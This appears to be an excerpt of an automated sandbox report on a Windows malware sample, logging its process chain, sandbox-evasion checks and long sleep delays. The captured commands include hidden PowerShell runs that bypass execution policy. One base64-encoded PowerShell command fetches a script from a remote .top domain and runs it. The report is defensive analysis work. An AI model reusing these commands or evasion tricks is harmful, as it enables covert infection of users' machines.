              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2358
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 635
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 752
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1838
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1411
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8428
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 864
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1936
              Source: C:\Windows\System32\svchost.exe TID: 6980Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 336 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 2358 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 635 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep count: 752 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep count: 1647 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep count: 1838 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep count: 8005 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 1411 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 8428 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep count: 864 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep count: 1936 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, type: DROPPED
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25
oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -c "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsikcir4vgn3aunqow15qwhlz0nzu3lzdedaedlpnkk5ahrtm1pxwky0zkvqddnmvmdscvriajzhadzpwuw2zuvqz0z0nxpovjdwtwnxzdntohe4ckswwtd6cnnmvia9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgnsb8icuge1tjagfyxsrffskpowokcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hria9iftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpowokbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsbbaw50xshhzxqtrgf0zsatrm9ybwf0ig1tktskjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkid0gmzskswygkcrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknsaricrscghgmgtuekzzwhhxz0rqy1u1ogjdqxfnzwjkrm1pddu3qw9kuellc05gdk5jcnruz0mzewxjbmhvz0dommf6ytfxum5cwmtvmthjrkzknufkzcatz3qgntkpihskicagicrxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gjhfrcwpidmj5qumwc2znzxlkdzawdhnztehjtfpab093y1pks3vfb1l4zllrs3lrumfuatvqwmdla1lpbks3qmfzsxixrwf4nxdqshvytm85rwdcymrzvglnamnnr0ygkyaxowogicagjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1id0gjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1icsgjgxwaeywa1r6rnnyehfnrgpjvtu4yknbcu1lykpgbu90ntdbb2rqsutztkz2tmnydg5nqzn5bgnuafvnr04yyxphmxfsbkjaa1uxogngrmq1qwrkic0gnja7cn0grwxzzsb7ciagicakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25
ovwdhtjjhemexcvjuqlprvte4y0zgzdugpsakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdugkyakbhborjbrvhpgc1h4cwdeamnvnthiq0fxtwviskztt3q1n0fvzfbjs3nornzoy3j0bmddm3lsy25ovwdhtjjhemexcvjuqlprvte4y0zgzdvbzgq7cn07cirxa3fqshzieufdmhnmz2v5sncwmhrzwuxisuxawm9pd2naskt1rw9zegzza0t5a1jhbmk1alpns2tzt25ln0jhwulymuvhedv3ueh1we5vouvnqmjkwvrptwpjtudgid0gswygkftpbnrdkedldc1eyxrlic1gb3jtyxqgsegpicsgmsatz3qgmjmpihsimdaifsbfbhnlihskcwtxakh2ynlbqzbzzmdleup3mdb0c1lmselmwlpvt3djwkplduvvwxhmwwtlewtsyw5pnwpaz0trwu9uszdcyvljcjffyxg1d1bidvhobzlfz0jizfluau1qy01hrn07cirxnhnrm0z2ede4evrvnzzbbvhkegtgelbtuwlttsa9icqolwpvaw4gkcg2ns4uotapicsgkdk3li4xmjipihwgr2v0lvjhbmrvbsatq291bnqgmtigfcalihtby2hhcl0kx30pktskjgjprfdyrdjwykhqid0gqcikjevycm9yqwn0aw9uuhjlzmvyzw5jzsa9icjdb250aw51zsiky3vybcatdxnlyiaiahr0cdovl3jpz3p1dnppm2juejmudg9wlzeucghwp3m9bwludhmxmyigfcbpzxg7cljlbw92zs1jdgvticjdolxvc2vyc1xqdwjsawncrg9jdw1lbnrzxcqojhe0c2szrnz4mth5vfu3nkftwep4a0z6ug1ravnnks5wczeiic1gb3jjzsakika7cgoicg93zxjzagvsbcatbm9wcm9mawxlic1legvjdxrpb25wb2xpy3kgynlwyxnzic1xaw5kb3dtdhlszsb
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
